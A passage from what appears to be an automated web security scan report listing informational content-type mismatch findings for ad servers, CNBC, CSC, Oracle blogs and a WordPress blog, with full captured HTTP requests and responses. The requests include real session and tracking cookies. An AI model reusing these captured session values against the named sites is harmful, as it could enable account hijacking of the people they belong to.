Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 16:02:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2; expires=Fri, 07-Oct-2011 16:02:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 747

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

31.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/2886387?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 16:07:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:50999:1315325243:B2|74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2; expires=Fri, 07-Oct-2011 16:07:23 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" t
...[SNIP]...

31.19. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /PortalServe/?pid=1398295G52620110830164853&pub=IC13501&flash=10&time=2|14:57|-5&redir=http://a1.interclick.com/icaid/192677/tid/1ff795b7-a8cc-487d-bdd1-056be6aa440f/click.ic?$CTURL$&pos=x&dom=http://search.cnbc.com&r=0.07496926933526993 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=47AC0400-3F06-2A6D-020A-1BB000220100; PRca=|AKln*9320:2|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKlnAC0U:2|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FrlJ:2|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GW7X:2|GV2B:1|GV12:2|GSur:3|#; PRpc=|FrlJGW7X:2|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 14:57:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4496
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=47AC0400-C30A-57B3-020A-1BB000220100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKln*9320:4|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlnAC0U:4|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FrlJ:4|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GW7X:4|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FrlJGW7X:4|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

31.20. http://api-cdn.cnbc.com/api/chart/chart.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api-cdn.cnbc.com
Path:   /api/chart/chart.asp

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /api/chart/chart.asp HTTP/1.1
Host: api-cdn.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html
Cache-Control: private
Expires: Tue, 06 Sep 2011 16:25:57 GMT
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Date: Tue, 06 Sep 2011 17:05:56 GMT
Content-Length: 70
Connection: close

<pre>An Error occurred with this request.

</pre>">Test link</a><br />

31.21. http://api.cnbc.com/api/chart/chart.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.cnbc.com
Path:   /api/chart/chart.asp

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /api/chart/chart.asp HTTP/1.1
Host: api.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 17:05:59 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 70
Expires: Tue, 06 Sep 2011 16:25:59 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<pre>An Error occurred with this request.

</pre>">Test link</a><br />

31.22. http://api.viglink.com/api/ping

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The response contains the following Content-type statement: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /api/ping HTTP/1.1
Host: api.viglink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 17:05:59 GMT
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 63
Connection: Close

error: Required string parameter &#039;key&#039; is not present

31.23. http://apps.cnbc.com/Includes/CheckPng/Script.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://apps.cnbc.com
Path:   /Includes/CheckPng/Script.asp

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /Includes/CheckPng/Script.asp HTTP/1.1
Host: apps.cnbc.com
Proxy-Connection: keep-alive
Referer: http://apps.cnbc.com/company/quote/index.asp?symbol=.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; s_cc=true; __qseg=Q_D; cnbc_regional_cookie=US; s_nr=1315339529299; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520window.location%25253D%252527http%25253A//data.cnbc.com/quotes/.DJIA%252527%25257D%2526oidt%253D2%2526ot%253DA; cnbcStreamQuoteMasterToggleRememberSwitch=on; cnbc_most_recent_quotes=.DJIA; 1602%5F0=DD828BEE89FEC86F5AA0DE67CEF82168; 1602%5F1=YYY5%5FpRpBg6l89WksRDGqi31ugg%3D%3D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 15:05:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 15:04:34 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Content-Length: 409

function onPng(bLoad)
{
   var Png = document.checkPng;
   Png.onerror = null;
   Png.onload = null;
   if (bLoad && Png.width == 1 && Png.height == 1)
   {
       Png.src = "//apps.cnbc.com/Includes/CheckPng
...[SNIP]...

31.24. http://assets1.csc.com/contact_us/media/contact_us4.css

Summary

Severity:   Information
Confidence:   Firm
Host:   http://assets1.csc.com
Path:   /contact_us/media/contact_us4.css

Issue detail

The response contains the following Content-type statement: text/css. The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /contact_us/media/contact_us4.css HTTP/1.1
Host: assets1.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/contact_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.3.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcsccom%253D%252526pid%25253DServices%2525253AHome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csc.com/contact_us%252526ot%25253DA%3B

Response

HTTP/1.0 200 OK
x-amz-id-2: NN2mfA5LpAM9OjMOFpyuRocT6yG6KHvhtAqnOd7zBFf9HoCw0CA+UYagWZ4HGzbt
x-amz-request-id: A4658F0B8F534814
Date: Tue, 05 Apr 2011 20:10:02 GMT
Last-Modified: Thu, 09 Sep 2010 16:57:48 GMT
ETag: "110fdbeea8d67aa93ab04add96edb26f"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 1312
Server: AmazonS3
Age: 70336
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 03b57673d7bf80a7b9a006891bb21f176af9959c8054a1c5aa9988a705892a57bc4fac331f8a9ef6,92b83a937267d932bb7e90c7a946364129bbbe5dd7302b49943bfc3c0e646157bcee997bc5545e39
Via: 1.0 8ff11be393de0e3f4a1ed1dda26bfcdd.cloudfront.net:11180 (CloudFront), 1.0 a9c811db7be33391d8494c0543c446ea.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<style>
ul#list_zones{font-size:0.9em;padding-left:12px;margin:0 0 10px 0;}
*html ul#list_zones {padding-left:15px;}
ul#list_zones li{list-style-image:url(http://assets1.csc.com/home/images/bullet_080
...[SNIP]...

31.25. http://assets1.csc.com/services/media/services3.css

Summary

Severity:   Information
Confidence:   Firm
Host:   http://assets1.csc.com
Path:   /services/media/services3.css

Issue detail

The response contains the following Content-type statement: The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /services/media/services3.css HTTP/1.1
Host: assets1.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/services
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.2.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_sess=%20s_cc%3Dtrue%3B%20ev4%3Dxss%3B%20s_sq%3Dcsccom%253D%252526pid%25253DSearch%2525253AHome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csc.com/services%252526ot%25253DA%3B

Response

HTTP/1.0 200 OK
x-amz-id-2: TXzkw+/ZF6bHKh24Icmd0pJrs21fuHrIecoLVrhF+qdahKaExnUOrCya+FKn/2CY
x-amz-request-id: 19A4B7235C794ED3
Date: Mon, 11 Oct 2010 20:27:51 GMT
Last-Modified: Thu, 09 Sep 2010 18:42:09 GMT
ETag: "d9cb18b4a038c7f46c24f9fe5ec7126e"
Content-Type: text/css
Content-Length: 2484
Server: AmazonS3
Age: 3471
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 2e825dc1ed328c6bf5076461d3ea8473e649a49a4135013b55b4f0650a12497c90bde6a02ba7d187,b4291688d12eec922db857a124635a44dbd927512b6718781ab33a2d5ce26996acff3b4bf12ddef8
Via: 1.0 8ff11be393de0e3f4a1ed1dda26bfcdd.cloudfront.net:11180 (CloudFront), 1.0 a9c811db7be33391d8494c0543c446ea.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<style>
a{text-decoration:none;}
a:hover{text-decoration:underline;}
#billboard {float:left;width:746px;height:166px;background-image:url(http://assets1.csc.com/services/images/servicebb_120109b.jpg);
...[SNIP]...

31.26. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blog.harbottle.com
Path:   /dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://blog.harbottle.com/dm/?p=20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; PHPSESSID=b6055d312cfe49b165dbf84a4f9f142b; __utma=40427633.423165929.1315345403.1315345403.1315345403.1; __utmc=40427633; __utmz=40427633.1315345403.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=40427633

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:10 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Pragma: no-cache
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 3391
Connection: close
Content-Type: text/html

function nVDxyoUNoxWe(){var aDnRlLWkZIxuL = new Array(69); aDnRlLWkZIxuL[0] = 259292677 ^ 1813646179; aDnRlLWkZIxuL[1] = 41247255 ^ 1813646179; aDnRlLWkZIxuL[2] = 91836227 ^ 1813646179; aDnRlLWkZIxuL[
...[SNIP]...

31.27. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blog.harbottle.com
Path:   /dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://blog.harbottle.com/dm/?p=20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; PHPSESSID=b6055d312cfe49b165dbf84a4f9f142b; __utma=40427633.423165929.1315345403.1315345403.1315345403.1; __utmc=40427633; __utmz=40427633.1315345403.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=40427633

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Vary: Accept-Encoding
Content-Length: 1875
Connection: close
Content-Type: text/html


addLoadEvent(lhKlhkMavT);

function createHiddenField(){
   var inp = document.createElement('input');
   inp.setAttribute('type', 'hidden');
   inp.setAttribute('id', 'HRXlXDPwKvYVGwGt');
   inp.setA
...[SNIP]...

31.28. http://blog.harbottle.com/dm/xmlrpc.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blog.harbottle.com
Path:   /dm/xmlrpc.php

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /dm/xmlrpc.php HTTP/1.1
Host: blog.harbottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:16 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: PHPSESSID=e97d8a82d9152534016674330abb1139; path=/
Content-Length: 42
Connection: close
Content-Type: text/html

XML-RPC server accepts POST requests only.

31.29. http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.oracle.com
Path:   /main/resource/resources/ora_code_blogs.js

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /main/resource/resources/ora_code_blogs.js HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 06 Sep 2011 15:09:16 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=14;ecid=51387194612877553,0:1)
Content-Length: 36547
Vary: Accept-Encoding
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

var oraVersion="ora_code_blogs:1.03:H22.1";function s_setAccount(){var sa=["oracledevall","ocom","en-us"];
if(location.href.indexOf("-stage")!=-1||location.href.indexOf("-dev")!=-1||location.href.ind
...[SNIP]...

31.30. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.oracle.com
Path:   /otn/resource/1OTN-2col/OTNHead-Short.png

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /otn/resource/1OTN-2col/OTNHead-Short.png HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 21:01:53 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=3600+360;age=372;ecid=47465485677722335,0:1)
Vary: Accept-Encoding
Content-Length: 38457
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

.PNG
.
...IHDR.......n.......J.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

31.31. http://blogs.oracle.com/otn/resource/SunOracle.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.oracle.com
Path:   /otn/resource/SunOracle.png

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /otn/resource/SunOracle.png HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/resource/html/aboutMe6.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 20:20:39 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
X-Oracle-DMS-ECID: 4984942665267212
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=3600+360;age=0;ecid=4984942665267212,0:1)
Vary: Accept-Encoding
Content-Length: 7183
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

.PNG
.
...IHDR...d...D.....wN.b....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&......*.E......z.d/J.ZE(..(b..-..nL.....~..7.}ov..r.4.....R..il|Bj.....    A4%U..N$.A.s.{..z..[V.{
...[SNIP]...

31.32. http://blogs.oracle.com/otn/resource/java-logo.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.oracle.com
Path:   /otn/resource/java-logo.png

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /otn/resource/java-logo.png HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/resource/html/aboutMe6.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 20:20:39 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
X-Oracle-DMS-ECID: 4444103192084779
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=3600+360;age=0;ecid=4444103192084779,0:1)
Vary: Accept-Encoding
Content-Length: 9353
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

.PNG
.
...IHDR...K...y.....q..L....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&......*.E......z.d/J.ZE(..(b..-..nL.....~..7.}ov..r.4.....R..il|Bj.....    A4%U..N$.A.s.{..z..[V.{
...[SNIP]...

